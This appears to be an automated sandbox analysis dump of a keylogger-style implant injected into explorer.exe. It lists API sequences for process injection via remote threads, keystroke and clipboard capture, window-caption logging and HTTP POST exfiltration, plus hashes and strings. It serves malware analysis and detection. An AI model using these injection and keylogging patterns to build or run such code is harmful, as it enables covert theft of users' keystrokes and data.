                                                        • Part of subcall function 00082724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000829F3,-00000001,0008128C), ref: 00082731
                                                        • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                        • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00081038
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008106C
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081075
                                                      • GetCurrentProcessId.KERNEL32(?,00081010), ref: 0008107B
                                                      • wsprintfA.USER32 ref: 000810E7
                                                      • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00081155
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081160
                                                      • Process32First.KERNEL32(00000000,?), ref: 0008117F
                                                      • CharLowerA.USER32(?), ref: 00081199
                                                      • lstrcmpi.KERNEL32(?,explorer.exe), ref: 000811B5
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081212
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0008126C
                                                      • CloseHandle.KERNEL32(00000000), ref: 0008127F
                                                      • Sleep.KERNELBASE(000003E8), ref: 0008129F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                      • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                      • API String ID: 3206029838-2805246637
                                                      • Opcode ID: 90536ab19f4f6bce970e7a6ad40275f1c3b84ea01975481b8196837e06f2b1ed
                                                      • Instruction ID: c891c7935db4289d37885e744c3d10944dcfcb3c9ed39a47a4427c91ed757d4e
                                                      • Opcode Fuzzy Hash: 90536ab19f4f6bce970e7a6ad40275f1c3b84ea01975481b8196837e06f2b1ed
                                                      • Instruction Fuzzy Hash: 2251C5302047019BD714BF74DC599BA77EDFF84B41F040528F9D6972A2EA389A468F62
                                                      Function 000810A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151stringsleepprocessCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                        • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                      • wsprintfA.USER32 ref: 000810E7
                                                        • Part of subcall function 0008276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00082777
                                                        • Part of subcall function 0008276D: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000810FE), ref: 00082789
                                                      • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00081155
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081160
                                                      • Process32First.KERNEL32(00000000,?), ref: 0008117F
                                                      • CharLowerA.USER32(?), ref: 00081199
                                                      • lstrcmpi.KERNEL32(?,explorer.exe), ref: 000811B5
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081212
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0008126C
                                                      • CloseHandle.KERNEL32(00000000), ref: 0008127F
                                                      • Sleep.KERNELBASE(000003E8), ref: 0008129F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                      • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                      • API String ID: 3018447944-2805246637
                                                      • Opcode ID: 8618b74207d87235530d0522142eaa1206f961f1ce3d32bd0a57018a044c5dec
                                                      • Instruction ID: a52374c8d3c32c87d7b7eec75c6ac1f607deb3f7449bc71aaab08c49aa80d9b3
                                                      • Opcode Fuzzy Hash: 8618b74207d87235530d0522142eaa1206f961f1ce3d32bd0a57018a044c5dec
                                                      • Instruction Fuzzy Hash: 6F41A1302047019BD714BF649C959BE77EDFF84B50F000628B9D6972E2EF389E068B62
                                                      Function 00089AE0 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 122 89ae0-89ae5 123 89aeb-89af8 122->123 124 89cad 122->124 125 89b0a-89b0f 123->125 124->124 126 89b11 125->126 127 89b00-89b05 126->127 128 89b13 126->128 130 89b06-89b08 127->130 129 89b18-89b1a 128->129 131 89b1c-89b21 129->131 132 89b23-89b27 129->132 130->125 130->126 131->132 132->129 133 89b29 132->133 134 89b2b-89b32 133->134 135 89b34-89b39 133->135 134->129 134->135 136 89b48-89b4a 135->136 137 89b3b-89b44 135->137 140 89b4c-89b51 136->140 141 89b53-89b57 136->141 138 89bba-89bbd 137->138 139 89b46 137->139 142 89bc2-89bc5 138->142 139->136 140->141 143 89b59-89b5e 141->143 144 89b60-89b62 141->144 147 89bc7-89bc9 142->147 143->144 145 89b84-89b93 144->145 146 89b64 144->146 149 89ba4-89bb1 145->149 150 89b95-89b9c 145->150 148 89b65-89b67 146->148 147->142 151 89bcb-89bce 147->151 153 89b69-89b6e 148->153 154 89b70-89b74 148->154 149->149 156 89bb3-89bb5 149->156 150->150 155 89b9e 150->155 151->142 152 89bd0-89bec 151->152 152->147 157 89bee 152->157 153->154 154->148 158 89b76 154->158 155->130 156->130 159 89bf4-89bf8 157->159 160 89b78-89b7f 158->160 161 89b81 158->161 162 89bfa-89c10 LoadLibraryA 159->162 163 89c3f-89c42 159->163 160->148 160->161 161->145 164 89c11-89c16 162->164 165 89c45-89c4c 163->165 164->159 166 89c18-89c1a 164->166 167 89c4e-89c50 165->167 168 89c70-89ca0 VirtualProtect * 2 165->168 170 89c1c-89c22 166->170 171 89c23-89c30 GetProcAddress 166->171 172 89c52-89c61 167->172 173 89c63-89c6e 167->173 169 89ca4-89ca8 168->169 169->169 174 89caa 169->174 170->171 175 89c39-89c3c 171->175 176 89c32-89c37 171->176 172->165 173->172 174->124 176->164
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_88000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 761afedd686cb8d8ddbda319575de0f1710e3ed48b48c1cc1c0ee351131be086
                                                      • Instruction ID: 0d37eedbe500ee790c8412a6b65a8675b6b3dcc5f5d5e4945e36827d966a7865
                                                      • Opcode Fuzzy Hash: 761afedd686cb8d8ddbda319575de0f1710e3ed48b48c1cc1c0ee351131be086
                                                      • Instruction Fuzzy Hash: 495124B1A446524AD721BA78DD807B5BBE4FB52334B2C0739C5E6CB3C6E7A45806C7A0
                                                      Function 0008276D Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 177 8276d-8277f OpenFileMappingA 178 82781-82791 MapViewOfFile 177->178 179 82794-82798 177->179 178->179
                                                      APIs
                                                      • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00082777
                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000810FE), ref: 00082789
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$MappingOpenView
                                                      • String ID:
                                                      • API String ID: 3439327939-0
                                                      • Opcode ID: f697b1d04ea33550ba84d640e082f874987e236cd832537d4e05d0301a145ddd
                                                      • Instruction ID: b6b55214a3d7b72dd5065cc7f6cf5cc5cfe51089837142714a1d2e3023f5fcf5
                                                      • Opcode Fuzzy Hash: f697b1d04ea33550ba84d640e082f874987e236cd832537d4e05d0301a145ddd
                                                      • Instruction Fuzzy Hash: 23D01732715231BBE3745A7B6C0CF83AEDDEFC6AE1B010025B94DD2190D6648810C7F0
                                                      Function 0008275A Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 180 8275a-8276c UnmapViewOfFile CloseHandle
                                                      APIs
                                                      • UnmapViewOfFile.KERNEL32(00000000,?,0008129A,00000001), ref: 0008275E
                                                      • CloseHandle.KERNELBASE(?), ref: 00082765
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CloseFileHandleUnmapView
                                                      • String ID:
                                                      • API String ID: 2381555830-0
                                                      • Opcode ID: 8c5060b8b4834943f5dc63203dbdcab3c3850551d53c9b689452f560daeb98f7
                                                      • Instruction ID: e78c18ebb3f3fe14dbe1de984ec7bdf689ac5a628f3d417fc22d0e2a98b1dd89
                                                      • Opcode Fuzzy Hash: 8c5060b8b4834943f5dc63203dbdcab3c3850551d53c9b689452f560daeb98f7
                                                      • Instruction Fuzzy Hash: 7AB0123241503097E32427347C1C9DB3E18FFC96213050144F54D810104B2C0A018FE8
                                                      Function 00082A09 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 181 82a09-82a19 GetProcessHeap RtlAllocateHeap
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateProcess
                                                      • String ID:
                                                      • API String ID: 1357844191-0
                                                      • Opcode ID: 6f12a9a4d3fd0b48daed3c74c3a73a850d67d067b2b8cc6d9cc29207745153cb
                                                      • Instruction ID: 854f13ea7621927148a9a8b2bf7c264aaceb780fcb2716b8a169ac4b90289c09
                                                      • Opcode Fuzzy Hash: 6f12a9a4d3fd0b48daed3c74c3a73a850d67d067b2b8cc6d9cc29207745153cb
                                                      • Instruction Fuzzy Hash: 0CA002B16501006BFD4457E4DD1DF157658B7C4F01F4045447286C50509D7955449F21

                                                      Non-executed Functions

                                                      Function 000818BF Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208injectionnativesleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00082724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000829F3,-00000001,0008128C), ref: 00082731
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 000818F4
                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0008192F
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000819BF
                                                      • RtlMoveMemory.NTDLL(00000000,00083638,00000016), ref: 000819E6
                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00081A0E
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00081A1E
                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00081A38
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00081A40
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081A4E
                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A55
                                                      • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00081A6B
                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A72
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A88
                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081AB2
                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081AC5
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081ACC
                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081AD3
                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081AE7
                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00081AFE
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081B0B
                                                      • CloseHandle.KERNEL32(?), ref: 00081B11
                                                      • CloseHandle.KERNEL32(?), ref: 00081B17
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081B1A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                      • String ID: atan$ntdll$opera_shared_counter
                                                      • API String ID: 1066286714-2737717697
                                                      • Opcode ID: 36e689c70820efb820419eec2dab6d64e40f633ab622aee628fcb010377c2343
                                                      • Instruction ID: 174d13c8333c33db2c366c6690c673af472261b50b6cc6d7832f0528390f2b82
                                                      • Opcode Fuzzy Hash: 36e689c70820efb820419eec2dab6d64e40f633ab622aee628fcb010377c2343
                                                      • Instruction Fuzzy Hash: D6614B71204205AFE710EF65DC94EABBBECFF88B54F000519F98997291DB74DE058BA2
                                                      Function 00082799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000827B5
                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000827CD
                                                      • lstrlen.KERNEL32(?,00000000), ref: 000827D5
                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000827E0
                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000827FA
                                                      • wsprintfA.USER32 ref: 00082811
                                                      • CryptDestroyHash.ADVAPI32(?), ref: 0008282A
                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00082834
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                      • String ID: %02X
                                                      • API String ID: 3341110664-436463671
                                                      • Opcode ID: fafac3b923be732a0fc419871dc0777a5965ddf3f11d93127bce2daa8561b749
                                                      • Instruction ID: 7af9abcfa44f8fdb20a1014f3b0a0b848b8d4329f526ecb6ba9fbd9c9bd4efaa
                                                      • Opcode Fuzzy Hash: fafac3b923be732a0fc419871dc0777a5965ddf3f11d93127bce2daa8561b749
                                                      • Instruction Fuzzy Hash: A3112B71900108BFEB119B95EC98EEEBFBCFB88B11F104065FA45E2150DA754F459B60
                                                      Function 0008162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00081652
                                                      • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0008167A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: KeyboardStateUnicode
                                                      • String ID:
                                                      • API String ID: 3453085656-3916222277
                                                      • Opcode ID: 1047935c90087d710069a2d22a99efe4102876523e6bfe61ddc0ba0b841e58bd
                                                      • Instruction ID: 29f38b6ab814598dd83ed5aba00077f139db2babf61fac0e1786dbac03cf2fdc
                                                      • Opcode Fuzzy Hash: 1047935c90087d710069a2d22a99efe4102876523e6bfe61ddc0ba0b841e58bd
                                                      • Instruction Fuzzy Hash: 1B0184329006299BEB34EB54DD45BFB73FCBF45B10F08441AE9C1E2151E734D9568BA1
                                                      Function 000813AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144libraryloaderthreadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • RtlZeroMemory.NTDLL(00085013,0000001C), ref: 000813C8
                                                      • VirtualQuery.KERNEL32(000813AE,?,0000001C), ref: 000813DA
                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0008140B
                                                      • GetCurrentProcessId.KERNEL32(00000004), ref: 0008141C
                                                      • wsprintfA.USER32 ref: 00081433
                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00081448
                                                      • GetLastError.KERNEL32 ref: 0008144E
                                                      • RtlInitializeCriticalSection.NTDLL(0008582C), ref: 00081465
                                                      • Sleep.KERNEL32(000001F4), ref: 00081489
                                                      • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 000814A6
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000814AF
                                                      • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 000814D0
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000814D3
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000814F1
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0008150D
                                                      • CloseHandle.KERNEL32(00000000), ref: 00081514
                                                      • RtlExitUserThread.NTDLL(00000000), ref: 0008152A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                      • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                      • API String ID: 3628807430-1779906909
                                                      • Opcode ID: 0d1da8dc0e211480dc30328cac78b55f9fbc3807973028df58c33a94b06f89d9
                                                      • Instruction ID: 735b7a70de4e956d7122513613398751e416d658d32f83b3185d311b43a817db
                                                      • Opcode Fuzzy Hash: 0d1da8dc0e211480dc30328cac78b55f9fbc3807973028df58c33a94b06f89d9
                                                      • Instruction Fuzzy Hash: 7E41B570640B04EBE710BF65EC19E9F3FACFF84B51B004029F6C59A292DB7999018FA1
                                                      Function 000816B9 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 90stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 255 816b9-816cc RtlEnterCriticalSection 256 817ce-817db RtlLeaveCriticalSection 255->256 257 816d2-816e7 lstrlenW 255->257 258 817cc-817cd 257->258 259 816ed-81700 lstrlenW 257->259 258->256 260 8171e-81721 259->260 261 81702-81719 call 829ce 259->261 263 8174e-81758 GetForegroundWindow 260->263 264 81723-81724 260->264 261->260 263->258 267 8175a-8176f GetWindowTextW 263->267 264->258 266 8172a-8174c call 817dc wsprintfW 264->266 275 817b6-817bd call 829eb 266->275 268 8177a-81789 lstrcmpW 267->268 269 81771-81774 GetClassNameW 267->269 271 8178b-817b3 lstrcpyW call 817dc wsprintfW 268->271 272 817bf-817c6 lstrcatW 268->272 269->268 271->275 272->258 275->258
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(0008582C), ref: 000816C4
                                                      • lstrlenW.KERNEL32 ref: 000816DB
                                                      • lstrlenW.KERNEL32 ref: 000816F3
                                                      • wsprintfW.USER32 ref: 00081743
                                                      • GetForegroundWindow.USER32 ref: 0008174E
                                                      • GetWindowTextW.USER32(00000000,00085850,00000800), ref: 00081767
                                                      • GetClassNameW.USER32(00000000,00085850,00000800), ref: 00081774
                                                      • lstrcmpW.KERNEL32(00085020,00085850), ref: 00081781
                                                      • lstrcpyW.KERNEL32(00085020,00085850), ref: 0008178D
                                                      • wsprintfW.USER32 ref: 000817AD
                                                      • lstrcatW.KERNEL32 ref: 000817C6
                                                      • RtlLeaveCriticalSection.NTDLL(0008582C), ref: 000817D3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                      • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                      • API String ID: 2651329914-3371406555
                                                      • Opcode ID: 757df017c9863c0e0ed70b929079f800b9485ac0c02a4dc8e298e1e1eff6aa01
                                                      • Instruction ID: e106a69ff408d8b0d66b3fc31dadf507e352e016c891a9268a5da8e7baf2df89
                                                      • Opcode Fuzzy Hash: 757df017c9863c0e0ed70b929079f800b9485ac0c02a4dc8e298e1e1eff6aa01
                                                      • Instruction Fuzzy Hash: CE21B734544A14ABE7217B25FC89EAF3EBCFF81F56B144028F5C196162DE198D028BF5
                                                      Function 000825F1 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 284 825f1-8262f GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 285 8267d-8267f 284->285 286 82631-82635 285->286 287 82681-8268e CloseHandle 285->287 288 82671-82677 Thread32Next 286->288 289 82637-8263b 286->289 288->285 289->288 290 8263d-82656 OpenThread 289->290 291 82658-8265e SuspendThread 290->291 292 82660 ResumeThread 290->292 293 82666-8266d CloseHandle 291->293 292->293 293->288
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 00082603
                                                      • GetCurrentThreadId.KERNEL32 ref: 0008260B
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0008261B
                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 00082629
                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00082648
                                                      • SuspendThread.KERNEL32(00000000), ref: 00082658
                                                      • CloseHandle.KERNEL32(00000000), ref: 00082667
                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 00082677
                                                      • CloseHandle.KERNEL32(00000000), ref: 00082682
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                      • String ID:
                                                      • API String ID: 1467098526-0
                                                      • Opcode ID: 6c153cda338048d470b88c78b472e7e2587ded5770a804ff46caec27f8830615
                                                      • Instruction ID: b03dfa3635f73c53ef02778bef4dd97478a1a04b34a9c8620f52957b2d5eb463
                                                      • Opcode Fuzzy Hash: 6c153cda338048d470b88c78b472e7e2587ded5770a804ff46caec27f8830615
                                                      • Instruction Fuzzy Hash: 5D117C31404200EFE711AF60AC5CB6EBEA4FF84B05F000529FAC692150E7388A199FA3
                                                      Function 000820A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 294 820a1-820fc call 8240f call 82a09 call 8298a call 824cc 303 820fe-82115 294->303 304 82117-82123 294->304 307 82127-82129 303->307 304->307 308 823fd-8240c call 829eb 307->308 309 8212f-82166 RtlZeroMemory 307->309 313 8216c-82187 309->313 314 823f5-823fc 309->314 315 821b9-821cb 313->315 316 82189-8219a call 8243d 313->316 314->308 321 821cf-821d1 315->321 322 8219c-821ab 316->322 323 821ad 316->323 325 823e2-823e8 321->325 326 821d7-82233 call 8288d 321->326 324 821af-821b7 322->324 323->324 324->321 327 823ea-823ec call 829eb 325->327 328 823f1 325->328 334 82239-8223e 326->334 335 823db 326->335 327->328 328->314 336 82258-82286 call 82a09 wsprintfW 334->336 337 82240-82251 334->337 335->325 340 82288-8228a 336->340 341 8229f-822b6 336->341 337->336 342 8228b-8228e 340->342 347 822b8-822ee call 82a09 wsprintfW 341->347 348 822f5-8230f 341->348 343 82299-8229b 342->343 344 82290-82295 342->344 343->341 344->342 346 82297 344->346 346->341 347->348 352 823b8-823ce call 829eb 348->352 353 82315-82328 348->353 361 823d0-823d2 call 829eb 352->361 362 823d7 352->362 353->352 356 8232e-82344 call 82a09 353->356 363 82346-82351 356->363 361->362 362->335 365 82353-82360 call 829ce 363->365 366 82365-8237c 363->366 365->366 370 8237e 366->370 371 82380-8238d 366->371 370->371 371->363 372 8238f-82393 371->372 373 823ad-823b4 call 829eb 372->373 374 82395 372->374 373->352 375 82395 call 829bd 374->375 377 8239a-823a7 RtlMoveMemory 375->377 377->373
                                                      APIs
                                                        • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                        • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                        • Part of subcall function 0008298A: lstrlen.KERNEL32(00084FE2,?,00000000,00000000,000820DD,75712B62,00084FE2,00000000), ref: 00082992
                                                        • Part of subcall function 0008298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00084FE2,00000001,00000000,00000000), ref: 000829A4
                                                        • Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE
                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 00082139
                                                      • wsprintfW.USER32 ref: 00082272
                                                      • wsprintfW.USER32 ref: 000822DD
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823A7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                      • API String ID: 4204651544-1701262698
                                                      • Opcode ID: 5a75ec7aaa5246b68fcf205f19a0b393a975a851f35745c89a23fa9bc14736c6
                                                      • Instruction ID: eb393b0eeacd80a5bfa002af34c47191fe6bec282c1bd132379949c4154c94d3
                                                      • Opcode Fuzzy Hash: 5a75ec7aaa5246b68fcf205f19a0b393a975a851f35745c89a23fa9bc14736c6
                                                      • Instruction Fuzzy Hash: A7A13A71608345AFD750AF68D888A6BBBE9FFC8B40F14082DF5C5D7252DA78DA048B52
                                                      Function 000812AE Relevance: 7.6, APIs: 5, Instructions: 93stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
